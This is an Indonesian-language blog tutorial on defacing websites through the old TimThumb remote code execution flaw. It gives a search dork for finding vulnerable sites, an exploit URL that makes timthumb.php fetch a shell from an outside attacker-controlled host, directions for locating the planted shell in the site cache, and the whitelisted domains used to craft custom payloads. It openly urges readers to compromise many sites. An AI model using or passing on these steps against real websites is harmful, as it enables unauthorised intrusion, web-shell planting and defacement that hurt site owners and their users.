Deface Poc Timthumb RCE

Asalamualaikum
Oke disini siapa si yang gak kenal sama deface :D yap kali ini gua bakal kasih tutorial ke kalian cara deface metode Timthumb Remote Code Execution 
Ya walapun tegolong poc lama tapi masih banyak loh web web yang vuln poc ini :3 wow enak kan, kalau mau banyak lagi silahkan kembangin dork dorknya pasti bakalan penuh bar browser kalian dengan shell shell :v 
Tapi di poc ini ada juga kekurangan nya yaitu exploit nya hanya bisa digunakan di versi 1.x jadi harus lebih pintar dalam mengembangkan dork nya.
Ini Dork umum bagi saya 

Dork : inurl:timthumb.php?src=

Nah coba kalian kembangin lagi pake intext , intitle, allinurl dll :)

Exploit :

src=http://flickr.com.zafkiel.net/handler.php

Contoh web yang vuln 
langsung aja paste exploitnya :

• http://webtarget.com/timthumb.php?src=http://flickr.com.zafkiel.net/handler.php

Jika berhasil maka tampilannya seperti ini
tinggal akses aja shell kalian, letak shell tertera di Unable to open image : 
Nah contoh nya kaya ginu

https://www.target.co.li/cache/external_cl......php

Ya sesuai path kalian sih itu hanya contoh.

Untuk membuat payload sendiri, subdomain yang dapat digunakan adalah berikut

  'flickr.com'
  'picasa.com'
  'blogger.com'
  'wordpress.com'
  'img.youtube.com'
  'upload.wikimedia.org',
  'photobucket.com',

Oke sekian dan terimakasih semoga bermanfaat


Bug Hunter

Author & Editor

Has laoreet percipitur ad. Vide interesset in mei, no his legimus verterem. Et nostrum imperdiet appellantur usu, mnesarchum referrentur id vim.

0 Comments:

Post a Comment

 
biz.